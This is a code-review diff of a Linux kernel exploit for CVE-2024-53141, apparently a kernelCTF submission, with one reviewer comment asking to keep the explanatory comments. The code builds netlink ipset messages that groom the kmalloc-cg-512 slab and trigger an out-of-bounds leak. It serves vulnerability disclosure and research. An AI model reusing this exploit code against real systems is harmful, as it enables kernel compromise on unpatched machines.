pocs/linux/kernelctf/CVE-2024-53141_lts/exploit/lts-6.6.62/exploit.c

```diff
@@ -196,198 +196,145 @@ int netlink_open(int proto)
+	if (type_name)
+	{ // Only CREATE commands need type_name
+		mnl_attr_put_strz(nlh, IPSET_ATTR_TYPENAME, type_name);
+	}
 	mnl_attr_put_u8(nlh, IPSET_ATTR_FAMILY, family);
 	mnl_attr_put_u8(nlh, IPSET_ATTR_REVISION, 0);
 
-	struct nlattr *attr_data = mnl_attr_nest_start(nlh, IPSET_ATTR_DATA);
+	return nlh;
+}
 
-	struct nlattr *attr_ip = mnl_attr_nest_start(nlh, IPSET_ATTR_IP);
+// Function to create an IP set under kmalloc-cg-512 cache
+int create_ip_set_kmalloc_512(int sock_fd, const char *set_name, const char *type_name,
+							  uint8_t family, int extra)
+{
+	char buf[1024];
+	struct nlmsghdr *nlh = setup_ip_set_message(buf, IPSET_CMD_CREATE | (6 << 8),
+												NLM_F_REQUEST | NLM_F_ACK,
+												set_name, type_name, family, 4);
 
-	// 0x35*8+0x58 is under kmalloc-cg-512
+	struct nlattr *attr_data = mnl_attr_nest_start(nlh, IPSET_ATTR_DATA);
+	struct nlattr *attr_ip = mnl_attr_nest_start(nlh, IPSET_ATTR_IP);
 	mnl_attr_put_u32(nlh, IPSET_ATTR_IPADDR_IPV4 | NLA_F_NET_BYTEORDER, htonl(-0x35));
-
 	mnl_attr_nest_end(nlh, attr_ip);
 
 	attr_ip = mnl_attr_nest_start(nlh, IPSET_ATTR_IP_TO);
 	mnl_attr_put_u32(nlh, IPSET_ATTR_IPADDR_IPV4 | NLA_F_NET_BYTEORDER, htonl(-1));
 	mnl_attr_nest_end(nlh, attr_ip);
 
-	if (extra){
-		// map size depend on map = ip_set_alloc(sizeof(*map) + elements * set->dsize);
-		// IPSET_FLAG_WITH_COMMENT cause set->dsize == 0x8
-		// sizeof(*map) == sizeof(struct bitmap_ip) == 0x58
-		// 0x35*0x8 + sizeof(*map) is under kmalloc-cg-512
-		mnl_attr_put_u32(nlh, IPSET_ATTR_CADT_FLAGS | NLA_F_NET_BYTEORDER, htonl(IPSET_FLAG_WITH_COMMENT));
+	if (extra)
+	{
+		mnl_attr_put_u32(nlh, IPSET_ATTR_CADT_FLAGS | NLA_F_NET_BYTEORDER,
+						 htonl(IPSET_FLAG_WITH_COMMENT));
 	}
 
 	mnl_attr_nest_end(nlh, attr_data);
-
 	return netlink_send(sock_fd, nlh);
 }
 
 // Function to add an IP address to the set
 int trigger_oob_leak(int sock_fd, const char *set_name, uint8_t family)
 {
-
 	char buf[1024];
-	struct nlmsghdr *nlh = mnl_nlmsg_put_header(buf);
-
-	nlh->nlmsg_type = IPSET_CMD_ADD | (NFNL_SUBSYS_IPSET << NFNL_SUBSYS_ID_SHIFT);
-	nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_EXCL;
-
-	mnl_nlmsg_put_extra_header(nlh, 4);
-
-	mnl_attr_put_u8(nlh, IPSET_ATTR_PROTOCOL, IPSET_PROTOCOL);
-	mnl_attr_put_strz(nlh, IPSET_ATTR_SETNAME, set_name);
-
-	mnl_attr_put_u8(nlh, IPSET_ATTR_FAMILY, family);
-	mnl_attr_put_u8(nlh, IPSET_ATTR_REVISION, 0);
+	struct nlmsghdr *nlh = setup_ip_set_message(buf, IPSET_CMD_ADD | (NFNL_SUBSYS_IPSET << NFNL_SUBSYS_ID_SHIFT),
+												NLM_F_REQUEST | NLM_F_ACK | NLM_F_EXCL,
+												set_name, NULL, family, 4);
 
 	struct nlattr *attr_data = mnl_attr_nest_start(nlh, IPSET_ATTR_DATA);
-
 	struct nlattr *attr_ip = mnl_attr_nest_start(nlh, IPSET_ATTR_IP);
-
 	mnl_attr_put_u32(nlh, IPSET_ATTR_IPADDR_IPV4 | NLA_F_NET_BYTEORDER, htonl(-1));
-
 	mnl_attr_nest_end(nlh, attr_ip);
 
-	// IPSET_ATTR_CIDR==3 make `ip` is 0xe0000000 and `ip_to` 0xffffffff
```

Comment:
Please do not remove these very useful comments. Without these, it's much harder to understand what's allocated and where.